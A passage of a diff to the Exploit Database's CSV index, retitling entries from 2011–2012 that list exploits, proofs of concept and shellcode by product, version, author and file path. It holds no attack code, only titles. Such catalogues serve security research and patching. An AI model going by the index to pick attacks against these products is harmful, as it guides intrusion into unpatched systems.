File Parsing Buffer Overflow in QUO",2011-09-20,metasploit,windows,local,0 17882,platforms/php/webapps/17882.php,"JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit",2011-09-22,EgiX,php,webapps,0 17883,platforms/hardware/remote/17883.txt,"Blue Coat Reporter Unauthenticated Directory Traversal",2011-09-22,nitr0us,hardware,remote,0 17884,platforms/windows/remote/17884.py,"Cogent Datahub <= 7.1.1.63 - Remote Unicode Buffer Overflow Exploit",2011-09-22,mr_me,windows,remote,0 -17885,platforms/windows/dos/17885.txt,"Sunway ForceControl <= 6.1 sp3 Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0 +17885,platforms/windows/dos/17885.txt,"sunway forcecontrol <= 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0 17886,platforms/windows/remote/17886.py,"FreeFloat FTP Server Buffer Overflow Exploit (DEP Bypass)",2011-09-23,Blake,windows,remote,0 17887,platforms/php/webapps/17887.txt,"WordPress Link Library plugin <= 5.2.1 SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 17888,platforms/php/webapps/17888.txt,"WordPress AdRotate plugin <= 3.6.5 SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 @@ -15525,17 +15523,17 @@ id,file,description,date,author,platform,type,port 17892,platforms/windows/local/17892.pl,"Muse Music All-In-One 1.5.0.001 .pls File Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local,0 17893,platforms/windows/local/17893.pl,"GTA SA-MP server.cfg - Local Buffer Overflow Vulnerability",2011-09-26,Silent_Dream,windows,local,0 17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0 -17895,platforms/php/webapps/17895.txt,"Jarida 1.0 Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0 -17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 +17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0 +17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerability",2011-09-27,"Sohil Garg",jsp,webapps,0 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0 -17900,platforms/asp/webapps/17900.txt,"TimeLive Time and Expense Tracking 4.1.1 Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 +17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 17902,platforms/windows/local/17902.c,"Norman Security Suite 8 (nprosec.sys) Local Privilege Escalation 0day",2011-09-28,Xst3nZ,windows,local,0 17903,platforms/windows/dos/17903.txt,"NCSS <= 07.1.21 Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos,0 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 Remote Buffer Overflow (MSF)",2011-09-29,otoy,windows,remote,0 17905,platforms/php/webapps/17905.txt,"Typo3 File Disclosure",2011-09-29,"Number 7",php,webapps,0 -17906,platforms/php/webapps/17906.txt,"WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability",2011-09-30,"Miroslav Stampar",php,webapps,0 +17906,platforms/php/webapps/17906.txt,"Wordpress Plugin Bannerize <= 2.8.7 - SQL Injection Vulnerability",2011-09-30,"Miroslav Stampar",php,webapps,0 17908,platforms/freebsd/dos/17908.sh,"FreeBSD UIPC socket heap overflow proof-of-concept",2011-09-30,"Shaun Colley",freebsd,dos,0 17909,platforms/php/webapps/17909.txt,"MARINET CMS (room.php) <= Blind SQL Vulnerability",2011-09-30,"BHG Security Center",php,webapps,0 17911,platforms/php/webapps/17911.php,"Feed on Feeds <= 0.5 Remote PHP Code Injection Exploit",2011-09-30,EgiX,php,webapps,0 @@ -15550,8 +15548,8 @@ id,file,description,date,author,platform,type,port 17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 File Disclosure",2011-10-04,bd0rk,php,webapps,0 17928,platforms/windows/dos/17928.pl,"Ashampoo Burning Studio Elements 10.0.9 (.ashprj) Heap Overflow",2011-10-04,LiquidWorm,windows,dos,0 17929,platforms/windows/dos/17929.txt,"Google Chrome < 14.0.835.163 PDF File Handling Memory Corruption",2011-10-04,"Mario Gomes",windows,dos,0 -17930,platforms/windows/dos/17930.txt,"Cytel Studio <= 9.0.0 Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 -17931,platforms/windows/dos/17931.txt,"GenStat <= 14.1.0.5943 Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 +17930,platforms/windows/dos/17930.txt,"Cytel Studio <= 9.0.0 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 +17931,platforms/windows/dos/17931.txt,"genstat <= 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 <= 0.101- linux local privilege escalation",2011-10-05,zx2c4,linux,local,0 17933,platforms/windows/dos/17933.html,"DivX Plus Web Player ""file://"" Buffer Overflow Vulnerability PoC",2011-10-05,Snake,windows,dos,0 17935,platforms/php/webapps/17935.txt,"tsmim Lessons Library (show.php) SQL Injection",2011-10-06,M.Jock3R,php,webapps,0 @@ -15574,12 +15572,12 @@ id,file,description,date,author,platform,type,port 17955,platforms/php/webapps/17955.txt,"Filmis 0.2 Beta Multiple Vulnerabilities",2011-10-10,M.Jock3R,php,webapps,0 17956,platforms/php/webapps/17956.txt,"6kbbs Multiple Vulnerabilities",2011-10-10,"labs insight",php,webapps,0 17957,platforms/php/webapps/17957.txt,"RoundCube 0.3.1 XRF/SQL injection",2011-10-10,"Smith Falcon",php,webapps,0 -17958,platforms/php/webapps/17958.txt,"Cotonti CMS v0.9.4 Multiple Remote Vulnerabilities",2011-10-10,LiquidWorm,php,webapps,0 +17958,platforms/php/webapps/17958.txt,"cotonti cms 0.9.4 - Multiple Vulnerabilities",2011-10-10,LiquidWorm,php,webapps,0 17959,platforms/php/webapps/17959.txt,"POSH Multiple Vulnerabilities",2011-10-10,Crashfr,php,webapps,0 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 (SVG layout) Memory Corruption (0day)",2011-10-10,"Jose A. Vazquez",windows,remote,0 17961,platforms/php/webapps/17961.txt,"MyBB Advanced Forum Signatures (afsignatures-2.0.4) SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 17962,platforms/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar 2.2) - SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 -17963,platforms/windows/dos/17963.txt,"atvise webMI2ADS Web Server <= 1.0 Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos,0 +17963,platforms/windows/dos/17963.txt,"atvise webMI2ADS Web Server <= 1.0 - Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos,0 17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN <= 8.0.0.7 Use After Free",2011-10-10,"Luigi Auriemma",windows,dos,0 17965,platforms/windows/dos/17965.txt,"OPC Systems.NET <= 4.00.0048 Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0 17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate PLP File id Parameter Overflow",2011-10-10,metasploit,windows,local,0 @@ -15596,8 +15594,8 @@ id,file,description,date,author,platform,type,port 17980,platforms/php/webapps/17980.txt,"WordPress Contact Form plugin <= 2.7.5 SQL Injection",2011-10-14,Skraps,php,webapps,0 17981,platforms/windows/dos/17981.py,"MS11-064 TCP/IP Stack Denial of Service",2011-10-15,"Byoungyoung Lee",windows,dos,0 17982,platforms/windows/dos/17982.pl,"BlueZone Desktop .zap file Local Denial of Service Vulnerability",2011-10-15,Silent_Dream,windows,dos,0 -17983,platforms/php/webapps/17983.txt,"WP Photo Album Plus <= 4.1.1 SQL Injection Vulnerability",2011-10-15,Skraps,php,webapps,0 -17984,platforms/php/webapps/17984.txt,"Ruubikcms v 1.1.0 (/extra/image.php) Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0 +17983,platforms/php/webapps/17983.txt,"Wordpress Plugin Photo Album Plus <= 4.1.1 - SQL Injection Vulnerability",2011-10-15,Skraps,php,webapps,0 +17984,platforms/php/webapps/17984.txt,"Ruubikcms 1.1.0 - (/extra/image.php) Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0 17985,platforms/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow",2011-10-16,metasploit,windows,local,0 17986,platforms/osx/remote/17986.rb,"Apple Safari file:// Arbitrary Code Execution",2011-10-17,metasploit,osx,remote,0 17987,platforms/php/webapps/17987.txt,"WordPress BackWPUp Plugin 2.1.4 Code Execution",2011-10-17,"Sense of Security",php,webapps,0 @@ -15658,8 +15656,8 @@ id,file,description,date,author,platform,type,port 18050,platforms/php/webapps/18050.txt,"Joomla HM-Community (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 18051,platforms/windows/remote/18051.txt,"BroadWin WebAccess SCADA/HMI Client Remote Code Execution",2011-10-31,Snake,windows,remote,0 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC",2011-10-31,rgod,windows,dos,0 -18053,platforms/php/webapps/18053.txt,"WordPress Classipress Theme <= 3.1.4 Stored XSS",2011-10-31,"Paul Loftness",php,webapps,0 -18055,platforms/php/webapps/18055.txt,"WordPress WP Glossary Plugin SQL Injection",2011-10-31,longrifle0x,php,webapps,0 +18053,platforms/php/webapps/18053.txt,"wordpress classipress theme <= 3.1.4 - Stored XSS",2011-10-31,"Paul Loftness",php,webapps,0 +18055,platforms/php/webapps/18055.txt,"Wordpress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0 18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0 18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 MiniSMTP Server Remote Exploit",2011-10-31,"Dillon Beresford ",windows,remote,0 18058,platforms/php/webapps/18058.txt,"Joomla Component Alameda (com_alameda) SQL Injection",2011-10-31,kaMtiEz,php,webapps,0 @@ -15677,7 +15675,7 @@ id,file,description,date,author,platform,type,port 18072,platforms/linux/local/18072.sh,"Calibre E-Book Reader Local Root Race Condition Exploit",2011-11-03,zx2c4,linux,local,0 18075,platforms/php/webapps/18075.txt,"Ajax File and Image Manager 1.0 Final - Remote Code Execution Vulnerability",2011-11-04,EgiX,php,webapps,0 18076,platforms/php/webapps/18076.txt,"Advanced Poll 2.02 SQL Injection Vulnerability",2011-11-04,"Yassin Aboukir",php,webapps,0 -18077,platforms/windows/webapps/18077.txt,"HP Data Protector Media Operations <= 6.20 Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0 +18077,platforms/windows/webapps/18077.txt,"hp data protector media operations <= 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0 18078,platforms/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 Use After Free",2011-11-04,"Luigi Auriemma",windows,dos,0 18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 Remote Root File Disclosure Exploit",2011-11-04,"Todor Donev",hardware,remote,0 18080,platforms/linux/local/18080.c,"Linux <= 2.6.37-rc1 serial_multiport_struct Local Info Leak Exploit",2011-11-04,"Todor Donev",linux,local,0 @@ -15697,7 +15695,7 @@ id,file,description,date,author,platform,type,port 18095,platforms/php/webapps/18095.txt,"11in1 CMS 1.0.1 (do.php) - CRLF Injection Vulnerability",2011-11-08,LiquidWorm,php,webapps,0 18096,platforms/windows/local/18096.py,"Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow",2011-11-09,modpr0be,windows,local,0 18099,platforms/php/webapps/18099.txt,"osCSS2 ""_ID"" parameter Local file inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 -18100,platforms/php/webapps/18100.txt,"LabWiki <= 1.1 Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 +18100,platforms/php/webapps/18100.txt,"labwiki <= 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)",2011-11-09,Node,windows,remote,0 18105,platforms/linux/local/18105.sh,"glibc LD_AUDIT arbitrary DSO load Privilege Escalation",2011-11-10,zx2c4,linux,local,0 @@ -15707,10 +15705,10 @@ id,file,description,date,author,platform,type,port 18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",2011-11-13,metasploit,windows,local,0 18110,platforms/php/webapps/18110.txt,"CMS 4.x.x Zorder (SQL Injection Vul)",2011-11-13,"KraL BeNiM",php,webapps,0 18111,platforms/php/webapps/18111.php,"Wordpress Zingiri Plugin <= 2.2.3 (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 -18112,platforms/windows/dos/18112.txt,"Optima APIFTP Server <= 1.5.2.13 Multiple Vulnerabilities",2011-11-14,"Luigi Auriemma",windows,dos,0 +18112,platforms/windows/dos/18112.txt,"optima apiftp server <= 1.5.2.13 - Multiple Vulnerabilities",2011-11-14,"Luigi Auriemma",windows,dos,0 18113,platforms/windows/local/18113.rb,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.pls) Stack Buffer Overflow",2011-11-14,metasploit,windows,local,0 18114,platforms/php/webapps/18114.txt,"WordPress AdRotate plugin <= 3.6.6 SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps,0 -18115,platforms/php/webapps/18115.txt,"Pixie CMS 1.01 - 1.04 Blind SQL Injections",2011-11-14,Piranha,php,webapps,0 +18115,platforms/php/webapps/18115.txt,"Pixie CMS 1.01 - 1.04 - Blind SQL Injections",2011-11-14,Piranha,php,webapps,0 18116,platforms/multiple/dos/18116.html,"Firefox 8.0 Null Pointer Dereference PoC",2011-11-14,0in,multiple,dos,0 18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 (latest) - Time-based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0 18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq File Upload Vulnerability",2011-11-15,PCA,php,webapps,0 @@ -15719,7 +15717,7 @@ id,file,description,date,author,platform,type,port 18121,platforms/php/webapps/18121.txt,"FreeWebshop <= 2.2.9 R2 (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN SQL Injection Vulnerability",2011-11-16,"Asheesh kumar",hardware,webapps,0 18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control",2011-11-17,metasploit,windows,remote,0 -18124,platforms/windows/dos/18124.py,"Thunder kankan player Stack overflow/DOS Exploit",2011-11-18,hellok,windows,dos,0 +18124,platforms/windows/dos/18124.py,"Thunder kankan player - Stack overflow/DOS Exploit",2011-11-18,hellok,windows,dos,0 18125,platforms/windows/remote/18125.rb,"Wireshark console.lua pre-loading vulnerability",2011-11-19,metasploit,windows,remote,0 18126,platforms/php/webapps/18126.txt,"WordPress jetpack plugin SQL Injection Vulnerability",2011-11-19,longrifle0x,php,webapps,0 18127,platforms/php/webapps/18127.txt,"Freelancer calendar <= 1.01 SQL Injection Vulnerability",2011-11-19,muuratsalo,php,webapps,0 @@ -15746,7 +15744,7 @@ id,file,description,date,author,platform,type,port 18162,platforms/linux/shellcode/18162.c,"Linux/MIPS - execve /bin/sh - 48 bytes",2011-11-27,rigan,linux,shellcode,0 18163,platforms/linux/shellcode/18163.c,"Linux/MIPS - add user(UID 0) with password - 164 bytes",2011-11-27,rigan,linux,shellcode,0 18164,platforms/hardware/webapps/18164.php,"Android 'content://' URI Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",hardware,webapps,0 -18165,platforms/windows/dos/18165.txt,"Siemens Automation License Manager <= 500.0.122.1 Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 +18165,platforms/windows/dos/18165.txt,"siemens automation license manager <= 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin 0day",2011-11-28,Alberto_García_Illera,php,webapps,0 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine Remote Code Execution",2011-11-30,metasploit,multiple,remote,0 @@ -15796,9 +15794,9 @@ id,file,description,date,author,platform,type,port 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() - 32 bytes.",2011-12-10,rigan,linux_mips,shellcode,0 18228,platforms/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 Privilege Boundary Crossing Vulnerability",2011-12-10,otr,linux,local,0 18230,platforms/php/webapps/18230.txt,"FCMS_2.7.2 cms and earlier multiple stored XSS Vulnerability",2011-12-10,"Ahmed Elhady Mohamed",php,webapps,0 -18231,platforms/php/webapps/18231.txt,"Wordpress UPM-POLLS Plugin 1.0.4 Blind SQL Injection",2011-12-11,Saif,php,webapps,0 +18231,platforms/php/webapps/18231.txt,"Wordpress UPM-POLLS Plugin 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps,0 18232,platforms/php/webapps/18232.txt,"FCMS_2.7.2 cms and earlier multiple CSRF Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0 -18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 +18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post CSRF",2011-12-11,hackme,php,webapps,0 18239,platforms/php/webapps/18239.rb,"Traq <= 2.3 Authentication Bypass / Remote Code Execution Exploit",2011-12-13,metasploit,php,webapps,0 @@ -15808,7 +15806,7 @@ id,file,description,date,author,platform,type,port 18246,platforms/php/webapps/18246.txt,"Seotoaster SQL Injection Admin Login Bypass",2011-12-16,"Stefan Schurtz",php,webapps,0 18247,platforms/multiple/webapps/18247.txt,"Capexweb 1.1 SQL Injection Vulnerability",2011-12-16,"D1rt3 Dud3",multiple,webapps,0 18248,platforms/php/webapps/18248.pl,"mPDF <= 5.3 File Disclosure",2011-12-16,ZadYree,php,webapps,0 -18249,platforms/php/webapps/18249.txt,"appRain CMF v0.1.5 - Multiple Web Vulnerabilities",2011-12-19,Vulnerability-Lab,php,webapps,0 +18249,platforms/php/webapps/18249.txt,"appRain CMF 0.1.5 - Multiple Web Vulnerabilities",2011-12-19,Vulnerability-Lab,php,webapps,0 18250,platforms/php/webapps/18250.txt,"DotA OpenStats <= 1.3.9 SQL Injection",2011-12-19,HvM17,php,webapps,0 18251,platforms/php/webapps/18251.txt,"Joomla Component (com_dshop) SQL Injection Vulnerability",2011-12-19,CoBRa_21,php,webapps,0 18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 Local Denial of Service Vulnerability",2011-12-19,JaMbA,windows,dos,0 @@ -15826,7 +15824,7 @@ id,file,description,date,author,platform,type,port 18270,platforms/windows/dos/18270.py,"Putty 0.60 Crash PoC",2011-12-24,Level,windows,dos,0 18271,platforms/windows/dos/18271.py,"Windows Media Player 11.0.5721.5262 - Remote Denial Of Service (DOS)",2011-12-24,Level,windows,dos,0 18272,platforms/windows/dos/18272.py,"Windows Explorer Denial Of Service (DOS)",2011-12-24,Level,windows,dos,0 -18274,platforms/php/webapps/18274.txt,"OpenEMR 4 Multiple Vulnerabilities",2011-12-25,Level,php,webapps,0 +18274,platforms/php/webapps/18274.txt,"openemr 4 - Multiple Vulnerabilities",2011-12-25,Level,php,webapps,0 18275,platforms/win64/dos/18275.txt,"GdiDrawStream BSoD using Safari",2011-12-18,webDEViL,win64,dos,0 18276,platforms/php/webapps/18276.txt,"Wordpress Mailing List Plugin Arbitrary File Download",2011-12-26,6Scan,php,webapps,0 18277,platforms/php/webapps/18277.txt,"Free Image Hosting Script Arbitrary File Upload Vulnerability",2011-12-26,ySecurity,php,webapps,0 @@ -15856,7 +15854,7 @@ id,file,description,date,author,platform,type,port 18327,platforms/netware/dos/18327.txt,"Novell Netware XNFS.NLM NFS Rename Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18328,platforms/netware/dos/18328.txt,"Novell Netware XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0 -18330,platforms/php/webapps/18330.txt,"Wordpress Pay With Tweet Plugin <= 1.1 Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 +18330,platforms/php/webapps/18330.txt,"wordpress pay with tweet plugin <= 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro 0day",2012-01-08,"b33f g11tch",windows,local,0 18335,platforms/php/webapps/18335.txt,"MangosWeb SQL Injection Vulnerability",2012-01-08,Hood3dRob1n,php,webapps,0 18336,platforms/hardware/dos/18336.pl,"AirTies-4450 Unauthorized Remote Reboot",2012-01-08,rigan,hardware,dos,0 @@ -15864,13 +15862,13 @@ id,file,description,date,author,platform,type,port 18338,platforms/php/webapps/18338.txt,"phpMyDirectory.com 1.3.3 - SQL Injection",2012-01-08,Serseri,php,webapps,0 18339,platforms/windows/dos/18339.py,"GPSMapEdit 1.1.73.2 (.lst) - Local Denial of Service Vulnerability",2012-01-09,"Julien Ahrens",windows,dos,0 18340,platforms/php/webapps/18340.txt,"Paddelberg Topsite Script Authentication Bypass Vulnerability",2012-01-09,"Christian Inci",php,webapps,0 -18341,platforms/php/webapps/18341.txt,"Clip Bucket 2.6 Multiple Vulnerabilities",2012-01-09,YaDoY666,php,webapps,0 +18341,platforms/php/webapps/18341.txt,"clip bucket 2.6 - Multiple Vulnerabilities",2012-01-09,YaDoY666,php,webapps,0 18342,platforms/php/webapps/18342.txt,"SAPID 1.2.3 Stable Remote File Inclusion Vulnerability",2012-01-09,"Opa Yong",php,webapps,0 18343,platforms/linux/webapps/18343.pl,"Enigma2 Webinterface 1.7.x 1.6.x 1.5.x (linux) Remote File Disclosure",2012-01-09,"Todor Donev",linux,webapps,0 18344,platforms/php/webapps/18344.txt,"razorCMS 1.2 Path Traversal Vulnerability",2012-01-10,chap0,php,webapps,0 18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 ST (RRQ) Buffer Overflow Exploit",2012-01-10,b33f,windows,remote,0 -18347,platforms/php/webapps/18347.txt,"Pragyan CMS v 3.0 Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0 -18348,platforms/php/webapps/18348.txt,"w-CMS 2.01 Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0 +18347,platforms/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0 +18348,platforms/php/webapps/18348.txt,"w-cms 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0 18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0 18350,platforms/php/webapps/18350.txt,"Wordpress Age Verification Plugin <= 0.4 Open Redirect",2012-01-10,"Gianluca Brindisi",php,webapps,0 18351,platforms/netware/dos/18351.txt,"Novell Netware XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",netware,dos,0 @@ -15885,11 +15883,11 @@ id,file,description,date,author,platform,type,port 18367,platforms/windows/remote/18367.rb,"XAMPP WebDAV PHP Upload",2012-01-14,metasploit,windows,remote,0 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,metasploit,linux,remote,0 18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,metasploit,bsd,remote,0 -18370,platforms/multiple/dos/18370.txt,"PHP 5.3.8 Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",multiple,dos,0 +18370,platforms/multiple/dos/18370.txt,"php 5.3.8 - Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",multiple,dos,0 18371,platforms/php/webapps/18371.rb,"phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection",2012-01-14,"Marco Batista",php,webapps,0 18372,platforms/windows/local/18372.txt,"Microsoft Windows Assembly Execution Vulnerability MS12-005",2012-01-14,"Byoungyoung Lee",windows,local,0 18373,platforms/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management Directory Traversal",2012-01-15,"Chris Rock",jsp,webapps,0 -18374,platforms/php/webapps/18374.txt,"PHPDomainRegister v0.4a-RC2-dev Multiple Vulnerabilities",2012-01-16,Or4nG.M4N,php,webapps,0 +18374,platforms/php/webapps/18374.txt,"PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities",2012-01-16,Or4nG.M4N,php,webapps,0 18375,platforms/windows/local/18375.rb,"BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)",2012-01-17,metasploit,windows,local,0 18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport Remote Command Execution",2012-01-17,metasploit,windows,remote,0 18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 mChannel use after free vulnerability",2012-01-17,metasploit,osx,remote,0 @@ -15904,12 +15902,12 @@ id,file,description,date,author,platform,type,port 18386,platforms/php/webapps/18386.txt,"deV!L`z Clanportal 1.5.5 Moviebase Addon Blind SQL Injection Vulnerability",2012-01-18,"Easy Laster",php,webapps,0 18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow",2012-01-20,metasploit,windows,remote,0 18389,platforms/php/webapps/18389.txt,"Drupal CKEditor 3.0 - 3.6.2 - Persistent EventHandler XSS",2012-01-19,MaXe,php,webapps,0 -18390,platforms/php/webapps/18390.txt,"Wordpress uCan Post plugin <= 1.0.09 Stored XSS",2012-01-19,"Gianluca Brindisi",php,webapps,0 +18390,platforms/php/webapps/18390.txt,"wordpress ucan post plugin <= 1.0.09 - Stored XSS",2012-01-19,"Gianluca Brindisi",php,webapps,0 18392,platforms/php/webapps/18392.php,"appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit",2012-01-19,EgiX,php,webapps,0 18393,platforms/linux/remote/18393.rb,"Gitorious Arbitrary Command Execution",2012-01-20,metasploit,linux,remote,0 18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance Authentication Bypass Vulnerability",2012-01-20,v3n0m,asp,webapps,0 18395,platforms/asp/webapps/18395.txt,"EasyPage SQL Injection Vulnerability",2012-01-20,"Red Security TEAM",asp,webapps,0 -18396,platforms/php/webapps/18396.sh,"WhatsApp Status Changer v0.2 Exploit",2012-01-20,emgent,php,webapps,0 +18396,platforms/php/webapps/18396.sh,"WhatsApp Status Changer 0.2 - Exploit",2012-01-20,emgent,php,webapps,0 18397,platforms/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter <= 3.8.2 Remote Pre-Auth Command Execute",2012-01-20,Abysssec,windows,remote,0 18399,platforms/windows/dos/18399.py,"VLC 1.2.0 (libtaglib_pluggin.dll) DoS",2012-01-20,"Mitchell Adair",windows,dos,0 18401,platforms/windows/remote/18401.py,"Savant Web Server 3.1 Buffer Overflow Exploit (Egghunter)",2012-01-21,red-dragon,windows,remote,0 @@ -15919,11 +15917,11 @@ id,file,description,date,author,platform,type,port 18405,platforms/asp/webapps/18405.txt,"ARYADAD Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",asp,webapps,0 18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 WordPress Menu Plugin Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0 18410,platforms/php/webapps/18410.txt,"miniCMS 1.0 & 2.0 - PHP Code Inject",2012-01-22,Or4nG.M4N,php,webapps,0 -18411,platforms/linux/local/18411.c,"Mempodipper - Linux Local Root for => 2.6.39 (32-bit & 